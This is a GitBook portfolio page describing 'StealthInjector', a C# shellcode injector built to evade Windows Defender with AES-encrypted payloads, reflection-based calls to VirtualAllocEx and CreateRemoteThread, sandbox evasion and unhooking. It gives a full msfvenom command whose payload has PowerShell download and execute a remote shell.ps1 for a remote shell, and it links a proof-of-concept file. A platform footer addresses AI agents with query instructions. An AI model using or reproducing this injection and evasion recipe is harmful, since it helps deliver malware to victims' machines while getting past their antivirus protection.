> For the complete documentation index, see [llms.txt](https://gurpreet-portfolio.gitbook.io/gurpreet06/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gurpreet-portfolio.gitbook.io/gurpreet06/projects/stealthinjector.md). # StealthInjector StealthInjector.exe is an application written in C#, capable of injecting shellcode into a remote process and bypassing Windows Defender by directly decrypting our payload in memory and dynamically invoking functions such as VirtualAllocEx and CreateRemoteThread using System.Reflection module and obscuring their use in the code to evade static analysis. ### Features * Remote Interactive shell * Dynamically Invoke functions like VirtualAllocEx and CreateRemoteThread * Inject shellcode into remote process * Basic Sandbox Evasion ### How the script works: 1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows: ```python msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp ``` 1. Payload Encryption: Next, we encrypt the generated payload using AES256 algorithm. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code. 2. We apply the same encryption approach to the VirtualAllocEx and CreateRemoteThread function names to obscure their use in the code. 3. Dynamic Invocation and Decryption: Finally, using the System.Reflection module, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory. ### Note: Advanced antivirus programs may have hooked functions like "VirtualAllocEx" and "CreateRemoteThread." To execute our malicious payload, we first need to unhook them and then load our payload into memory. ### POC {% file src="/files/7fyAUcZZKN9odqPwcvDg" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gurpreet-portfolio.gitbook.io/gurpreet06/projects/stealthinjector.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.